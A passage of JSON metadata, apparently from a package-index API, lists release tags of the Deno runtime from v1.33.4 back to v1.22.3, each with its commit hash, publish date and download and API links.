ame":"v1.33.4","sha":"5be97b7584c712848336da90077db86fe4859d96","kind":"commit","published_at":"2023-05-18T16:21:18.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.33.4","html_url":"https://github.com/denoland/deno/releases/tag/v1.33.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.33.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.33.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.33.4/manifests"},{"name":"v1.33.3","sha":"12ba2d311bb6cce7c1bf2567748987e91585d540","kind":"commit","published_at":"2023-05-12T11:06:53.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.33.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.33.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.33.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.33.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.33.3/manifests"},{"name":"v1.33.2","sha":"c2a61a4192609615beba363f5606e6e04ae60c97","kind":"commit","published_at":"2023-05-04T14:39:05.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.33.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.33.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.33.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.33.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.33.2/manifests"},{"name":"v1.33.1","sha":"d5f52ef7ac20cb116fad574e3017f194124be312","kind":"commit","published_at":"2023-04-28T17:05:46.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.33.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.33.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.33.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.33.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.33.1/manifests"},{"name":"v1.33.0","sha":"39ece1fe0ddacc2cbf182403c9e7085bc01df5a6","kind":"commit","published_at":"2023-04-27T23:18:57.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.33.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.33.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.33.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.33.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.33.0/manifests"},{"name":"v1.32.5","sha":"6cfca9b33eb0647fc73ddfc20349ae9fb943d01a","kind":"commit","published_at":"2023-04-18T18:31:30.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.32.5","html_url":"https://github.com/denoland/deno/releases/tag/v1.32.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.32.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.32.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.32.5/manifests"},{"name":"v1.32.4","sha":"709cfd6d91d335c16337be9339d45250e02ae247","kind":"commit","published_at":"2023-04-12T15:17:55.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.32.4","html_url":"https://github.com/denoland/deno/releases/tag/v1.32.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.32.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.32.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.32.4/manifests"},{"name":"v1.32.3","sha":"73d472149ce6dd360a71ca5d1819d3f8f27754f8","kind":"commit","published_at":"2023-04-01T22:51:46.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.32.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.32.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.32.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.32.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.32.3/manifests"},{"name":"v1.32.2","sha":"24e0b31096682f0ec576e0021c1925611ec4e090","kind":"commit","published_at":"2023-03-31T20:41:10.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.32.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.32.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.32.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.32.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.32.2/manifests"},{"name":"v1.32.1","sha":"99b5eaa2f4f81b0f6fb46a388808a0d8f40b91e1","kind":"commit","published_at":"2023-03-23T20:00:23.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.32.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.32.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.32.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.32.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.32.1/manifests"},{"name":"v1.32.0","sha":"d06fdf6add1b3c55fc5f4a24956f17a363d513a4","kind":"commit","published_at":"2023-03-22T23:03:38.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.32.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.32.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.32.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.32.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.32.0/manifests"},{"name":"v1.31.3","sha":"f64adbe1a3b924b9436afa39b4302c5718bbb759","kind":"commit","published_at":"2023-03-16T05:41:00.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.31.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.31.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.31.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.31.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.31.3/manifests"},{"name":"v1.31.2","sha":"fc6edac5978e7a5e44fdcee05085c7492f0ccba9","kind":"commit","published_at":"2023-03-10T06:41:43.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.31.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.31.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.31.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.31.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.31.2/manifests"},{"name":"v1.31.1","sha":"86785f21194460d713276dca212302fa1bb1c943","kind":"commit","published_at":"2023-02-25T02:17:58.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.31.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.31.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.31.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.31.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.31.1/manifests"},{"name":"v1.31.0","sha":"b6ac54815c1bcfa44a45b3f2c1c982829482477f","kind":"commit","published_at":"2023-02-24T00:20:54.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.31.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.31.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.31.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.31.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.31.0/manifests"},{"name":"v1.30.3","sha":"f3fb8ee18826e66d3896ea864d2bedaed6c79308","kind":"commit","published_at":"2023-02-07T01:20:18.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.30.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.30.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.30.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.30.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.30.3/manifests"},{"name":"v1.30.2","sha":"cee13304ffe58286fcfab3526c46f95a7e23825d","kind":"commit","published_at":"2023-02-03T14:46:31.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.30.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.30.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.30.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.30.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.30.2/manifests"},{"name":"v1.30.1","sha":"000fb83c587a17118d83b990f1d08c98bb9cce2a","kind":"commit","published_at":"2023-02-02T14:26:43.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.30.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.30.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.30.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.30.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.30.1/manifests"},{"name":"v1.30.0","sha":"a6f915c22f34921780b4bcb8b6da8cd3bd20d5a8","kind":"commit","published_at":"2023-01-25T23:15:08.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.30.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.30.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.30.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.30.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.30.0/manifests"},{"name":"v1.29.4","sha":"65db94feba9d4d51a09b74629f566dbc90484fba","kind":"commit","published_at":"2023-01-16T22:07:42.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.29.4","html_url":"https://github.com/denoland/deno/releases/tag/v1.29.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.29.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.29.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.29.4/manifests"},{"name":"v1.29.3","sha":"9806dcc91496ab12c7fba238d411e23c22e2a302","kind":"commit","published_at":"2023-01-13T17:17:13.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.29.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.29.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.29.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.29.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.29.3/manifests"},{"name":"v1.29.2","sha":"14c4c8f9340235bd1ddb5388558c984beb0bb6d9","kind":"commit","published_at":"2023-01-05T13:37:23.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.29.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.29.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.29.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.29.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.29.2/manifests"},{"name":"v1.29.1","sha":"145013ab7fb00c7293ce33806f26dc4083a8da66","kind":"commit","published_at":"2022-12-15T16:32:14.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.29.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.29.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.29.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.29.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.29.1/manifests"},{"name":"v1.29.0","sha":"0d4e4af7acf82c1365999a7281910daa05f0e982","kind":"commit","published_at":"2022-12-14T23:22:54.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.29.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.29.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.29.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.29.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.29.0/manifests"},{"name":"v1.28.3","sha":"74064c9d8c222b33b2a552ea0af1054f57002a96","kind":"commit","published_at":"2022-12-01T10:10:17.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.28.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.28.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.28.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.28.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.28.3/manifests"},{"name":"v1.28.2","sha":"1aca16e23998ee54f6a15217cd4cc6b8b13299b7","kind":"commit","published_at":"2022-11-24T20:22:47.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.28.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.28.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.28.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.28.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.28.2/manifests"},{"name":"v1.28.1","sha":"2743d42099cb0596f03c7d1252e5cfbb53f7a9ec","kind":"commit","published_at":"2022-11-16T23:35:35.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.28.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.28.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.28.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.28.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.28.1/manifests"},{"name":"v1.28.0","sha":"916598f8a77d1fb7b7feb577e600ead2bc45045f","kind":"commit","published_at":"2022-11-13T20:31:36.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.28.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.28.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.28.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.28.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.28.0/manifests"},{"name":"v1.27.2","sha":"5cd5cfa8d655e8a71441cf9736df93efde75153c","kind":"commit","published_at":"2022-11-08T21:42:25.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.27.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.27.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.27.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.27.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.27.2/manifests"},{"name":"v1.27.1","sha":"d448c2950db2ed474405ace6a0a180301eeaa68d","kind":"commit","published_at":"2022-11-03T21:52:08.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.27.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.27.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.27.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.27.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.27.1/manifests"},{"name":"v1.27.0","sha":"b0fb8fa9dc08640e77eb0ab888a483db18a52a4b","kind":"commit","published_at":"2022-10-27T15:13:26.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.27.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.27.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.27.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.27.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.27.0/manifests"},{"name":"v1.26.2","sha":"d1f432bf12e5de645d45f1f2738a53981f39fa5b","kind":"commit","published_at":"2022-10-17T18:51:49.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.26.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.26.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.26.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.26.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.26.2/manifests"},{"name":"v1.26.1","sha":"753b60dd9b0c9bb5220609f2fe65ad06957690d6","kind":"commit","published_at":"2022-10-06T17:16:43.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.26.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.26.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.26.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.26.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.26.1/manifests"},{"name":"v1.26.0","sha":"d8827514ffef04c2e1732f7033ff6a374dd94d54","kind":"commit","published_at":"2022-09-28T22:10:44.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.26.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.26.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.26.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.26.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.26.0/manifests"},{"name":"v1.25.4","sha":"02afbe2af550ad5223d982e8fdd37f778b9d828c","kind":"commit","published_at":"2022-09-22T18:01:52.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.25.4","html_url":"https://github.com/denoland/deno/releases/tag/v1.25.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.25.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.25.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.25.4/manifests"},{"name":"v1.25.3","sha":"f561e765a75c749f1d1e2d6584edf6018435e6e1","kind":"commit","published_at":"2022-09-15T17:46:30.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.25.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.25.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.25.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.25.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.25.3/manifests"},{"name":"v1.25.2","sha":"3c5af2ba495b2d5770b3f5ed12e202ba2089ebda","kind":"commit","published_at":"2022-09-09T08:54:05.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.25.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.25.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.25.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.25.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.25.2/manifests"},{"name":"v1.25.1","sha":"1e78804d5c0b8204978dd77431ac33d8d16ce5bc","kind":"commit","published_at":"2022-09-02T00:07:43.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.25.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.25.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.25.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.25.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.25.1/manifests"},{"name":"v1.25.0","sha":"8986e2ced4adbf6185aea02a580036aa92c2872c","kind":"commit","published_at":"2022-08-24T22:20:07.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.25.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.25.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.25.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.25.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.25.0/manifests"},{"name":"v1.24.3","sha":"c79127061438234a60f63cf9d0a276328961f971","kind":"commit","published_at":"2022-08-11T18:38:32.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.24.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.24.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.24.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.24.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.24.3/manifests"},{"name":"v1.24.2","sha":"44ade24fb213875814c431c87abb3f79ecab1fef","kind":"commit","published_at":"2022-08-04T20:49:24.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.24.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.24.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.24.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.24.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.24.2/manifests"},{"name":"v1.24.1","sha":"fa9698fe9ec3ceb660c1865eb75f07a0bc5b90c5","kind":"commit","published_at":"2022-07-28T17:22:05.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.24.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.24.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.24.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.24.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.24.1/manifests"},{"name":"v1.24.0","sha":"f0e01682cce638303e3b6997788667a0f71dff8d","kind":"commit","published_at":"2022-07-20T23:28:00.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.24.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.24.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.24.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.24.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.24.0/manifests"},{"name":"v1.23.4","sha":"b0de3031dcfe6eab1156a2546b996005d1c07cfe","kind":"commit","published_at":"2022-07-12T18:55:29.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.23.4","html_url":"https://github.com/denoland/deno/releases/tag/v1.23.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.23.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.23.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.23.4/manifests"},{"name":"v1.23.3","sha":"0b07d1a40318147ec0782af9fe99048d5ef80984","kind":"commit","published_at":"2022-07-05T17:00:42.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.23.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.23.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.23.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.23.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.23.3/manifests"},{"name":"v1.23.2","sha":"5a5d3084ab0f20c511a70a1f2e12ef7bdd184ec2","kind":"commit","published_at":"2022-06-30T19:31:47.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.23.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.23.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.23.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.23.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.23.2/manifests"},{"name":"v1.23.1","sha":"9f9941c03b942469fb651477503f8cd19f18a1ab","kind":"commit","published_at":"2022-06-23T19:50:44.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.23.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.23.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.23.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.23.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.23.1/manifests"},{"name":"v1.23.0","sha":"e7ea4edc8a1a4fc339ac2267d9512a9374bc2ce5","kind":"commit","published_at":"2022-06-15T23:02:18.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.23.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.23.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.23.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.23.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.23.0/manifests"},{"name":"v1.22.3","sha":"43e7c5d328a5a17a8c33362caf642d6ded49f179","kind":"commit","published_at":"2022-